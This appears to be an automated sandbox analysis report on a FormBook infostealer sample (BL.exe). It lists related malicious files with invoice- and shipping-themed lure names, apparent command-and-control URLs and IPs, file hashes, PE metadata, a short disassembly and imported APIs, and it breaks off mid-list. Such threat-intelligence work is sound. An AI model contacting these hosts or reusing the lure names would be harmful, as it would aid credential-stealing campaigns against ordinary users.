65.21.196.90 | rDRAWINGDWGSINC.exe | malicious | FormBook | www.030002832.xyz/k59q/
65.21.196.90 | DHL AWB TRACKING DETAILS.exe | malicious | FormBook | www.030002787.xyz/jd21/?4h=5kdLJS6M41di2+SNW7K1XcXipX6NQkkN8kSgJbF3gr0dFVoGwgZsF4aW2rsxuxwIowbH&pPQ=OJEtxf4
65.21.196.90 | jeez.exe | malicious | FormBook | www.030002803.xyz/bw0u/
65.21.196.90 | quote894590895pdf.exe | malicious | FormBook | www.030002832.xyz/k59q/
65.21.196.90 | AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe | malicious | FormBook | www.030002252.xyz/2ncs/
65.21.196.90 | NU1aAbSmCr.exe | malicious | FormBook | www.030002304.xyz/6uay/
65.21.196.90 | 8EhMjL3yNF.exe | malicious | FormBook | www.030002304.xyz/f06i/
65.21.196.90 | BILL OF LADDING.exe | malicious | FormBook | www.030002837.xyz/y045/
65.21.196.90 | BAJFMONYm2.exe | malicious | FormBook | www.070001294.xyz/90jl/
65.21.196.90 | 5FRWRDOqk7.exe | malicious | FormBook | www.030002721.xyz/st0f/?-hF=sZ0LOH4&HPBxr6=OZJ3FWHE8eHsfWE6sR/jZh7GV9NsFGiNmpPQ4eftWQT1hyascoenGoAxdn6KH9WZ2QPSeMYxIK2pDBtCkY1R4v4J1R7l9kCKhVgR/LucEqSnpRqwhg==
94.23.162.163 | sBX8VM67ZE.exe | malicious | FormBook | www.kinkynerdspro.blog/niik/
94.23.162.163 | c3la9wUkHe.exe | malicious | FormBook | www.youreducation.academy/skhi/
94.23.162.163 | DOC 0201_360737031.exe | malicious | FormBook | www.youreducation.academy/skhi/
94.23.162.163 | Remittance advice.exe | malicious | FormBook, PureLog Stealer | www.youreducation.academy/skhi/
94.23.162.163 | product Inquiry and RFQ ART LTD.doc | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
94.23.162.163 | New Order.doc | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
94.23.162.163 | GXu0Ow8T1h.exe | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
94.23.162.163 | GcwoApxt8q.exe | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
94.23.162.163 | opszx.scr.exe | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
94.23.162.163 | MOQ010524Purchase order.doc | malicious | FormBook | www.kinkynerdspro.blog/ufuh/
                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          www.rudemyvague.infoBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 52.13.151.179
                                                                                                                          www.productanalytics.proPending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 54.38.220.85
                                                                                                                          www.launchdreamidea.xyzPO#071024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          www.drevohome.shopBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 54.38.220.85
                                                                                                                          www.itemsort.shopBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 188.114.97.3
                                                                                                                          longg002.cnBILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 8.210.49.139
                                                                                                                          Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          CP-ASDErDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          https://eadzhost.net/quieter/QUOTE_TECNO_GAZ_INDUSTRIES_63787_MC.rarGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.29.43
                                                                                                                          na.htaGet hashmaliciousCobalt Strike, FormBook, GuLoaderBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          DHL AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          jeez.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          quote894590895pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          NU1aAbSmCr.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          9vhyFG1hNa.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          8EhMjL3yNF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 65.21.196.90
                                                                                                                          MULTIBAND-NEWHOPEUSRequest for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                          • 209.74.64.189
                                                                                                                          Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          #U8a02#U55ae#U63cf#U8ff0.vbsGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          rDRAWINGDWGSINC.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.187
                                                                                                                          r0000000NT_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          Tandemmernes90.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                          • 209.74.64.189
                                                                                                                          PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.95.29
                                                                                                                          Aunali_khokhawala-In Services.Agreement-SDYAMPA 416944.rtfGet hashmaliciousEvilProxy, Fake Captcha, HTMLPhisherBrowse
                                                                                                                          • 209.74.66.146
                                                                                                                          CENA.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 209.74.64.190
                                                                                                                          CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCindex.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.254.175.252
                                                                                                                          index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.254.175.252
                                                                                                                          PDWsetup.exeGet hashmaliciousGhostRatBrowse
                                                                                                                          • 8.217.62.104
                                                                                                                          request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                          • 8.223.114.243
                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.241.41.42
                                                                                                                          SecuriteInfo.com.Trojan.GenericKD.72343208.3006.1077.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.241.41.42
                                                                                                                          yakuza.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.57.30.200
                                                                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 47.245.134.47
                                                                                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 8.213.113.50
                                                                                                                          arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 8.215.31.201
                                                                                                                          VOYAGERNET-AS-APVoyagerInternetLtdNZarm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 114.23.169.157
                                                                                                                          BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 103.106.67.112
                                                                                                                          Products Order Catalogs20242.exeGet hashmaliciousFormBookBrowse
                                                                                                                          • 103.106.67.112
                                                                                                                          0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                          • 111.65.234.232
                                                                                                                          i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 202.154.140.243
                                                                                                                          xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 203.96.31.242
                                                                                                                          KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                          • 103.146.201.21
                                                                                                                          kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                                                          • 203.96.177.211
                                                                                                                          https://app.realcreator.co/preview/9fe9f3e5-8e52-4155-934b-225a56159ee0Get hashmaliciousUnknownBrowse
                                                                                                                          • 103.146.241.97
                                                                                                                          arm5-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                                                                                                          • 114.23.243.29
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):196608
                                                                                                                          Entropy (8bit):1.1239949490932863
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Users\user\Desktop\BL.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):286208
                                                                                                                          Entropy (8bit):7.9939513049870135
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:6144:Byd8qhsSgIVBOW+uhTsqQC0AC+i2UUig4Xd0AbcSj8rW7LGdj:s8wsSRBGuhTjQC0CGUHqCj
                                                                                                                          MD5:9B849D9422829AB24EF3A402601B7688
                                                                                                                          SHA1:D48D87FDE9A9050896BC180B1428A465488E8ABE
                                                                                                                          SHA-256:BAD93C2A209715DA11A406D2EEE3AA9701AE5B617FE34FB86186F49B7E7FB66F
                                                                                                                          SHA-512:5B46C7E0A3DE16A2358530DA3077058D44D21E9DE551BB5FD25051D2A15324717D7ECD9047D3E893391AC64D494E2BDA1D11120FE8758762CEF6D638187A5F9B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.ir..X8XGa.._.....CR...o:_..R7D37CQX8XG9W5VXR7D37CQX8XG9W5.XR7J,.MQ.1.f.Vy.y._-@.3#7_*&TwV76<X0.U&q*M6gP9.....)\S&.U5Rc9W5VXR7=2>.l8_.zY0.k85.^...k8_.]...j85.^...m8_..P4]k85.D37CQX8X.|W5.YS7#..!QX8XG9W5.XP6O2<CQ.<XG9W5VXR7. 7CQH8XGYS5VX.7D#7CQZ8XA9W5VXR7B37CQX8XGYS5VZR7D37CSXx.G9G5VHR7D3'CQH8XG9W5FXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7jGR;%X8X.sS5VHR7D.3CQH8XG9W5VXR7D37CqX88G9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8XG9W5VXR7D37CQX8X
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.503718460836846
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                          • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                          File name:BL.exe
                                                                                                                          File size:1'313'649 bytes
                                                                                                                          MD5:0084fa11e77425fd332e10928312f760
                                                                                                                          SHA1:33de149315ca65380f3f4f39ac3dcb85e36f588d
                                                                                                                          SHA256:0d76a185c479321a6eb599b67de8126eb81d5e3f8a1b9d93c0abaeeef9c89e40
                                                                                                                          SHA512:a2feb26fd7028bfb40bb9872a261cbf95cd115406884e20dab5f4cfde98a15bb1bb966bc83f3871f27a80175db0274b1515863b0cd7873bd7ffa7f0cfb18c65b
                                                                                                                          SSDEEP:24576:ffmMv6Ckr7Mny5QL12pDAmpU4cY5Ww+tbFCxwya2ykBHsERupNY:f3v+7/5QLQp8wZ5b+zCTh5BLRuo
                                                                                                                          TLSH:7855F212F3D680B6E9A338712937E32AEB3575194327C4CBA7E42F768E111419B3B761
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                                          Icon Hash:1733312925935517
                                                                                                                          Entrypoint:0x416310
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:5
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:5
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:5
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                                                          Instruction
                                                                                                                          call 00007FB2CCBE1DACh
                                                                                                                          jmp 00007FB2CCBD5B7Eh
                                                                                                                          int3
                                                                                                                          int3
                                                                                                                          int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB2CCBD5D0Ah
cmp edi, eax
jc 00007FB2CCBD5EAAh
cmp ecx, 00000100h
jc 00007FB2CCBD5D21h
cmp dword ptr [004A94E0h], 00000000h
je 00007FB2CCBD5D18h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FB2CCBD5D0Ah
pop esi
pop edi
pop ebp
jmp 00007FB2CCBD616Ah
test edi, 00000003h
jne 00007FB2CCBD5D17h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FB2CCBD5D2Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FB2CCBD5D0Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FB2CCBD5CCEh
Programming Language:
• [ASM] VS2008 SP1 build 30729
• [ C ] VS2008 SP1 build 30729
• [C++] VS2008 SP1 build 30729
• [ C ] VS2005 build 50727
• [IMP] VS2005 build 50727
• [ASM] VS2008 build 21022
• [RES] VS2008 build 21022
• [LNK] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8cd3c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9298 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x840 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, 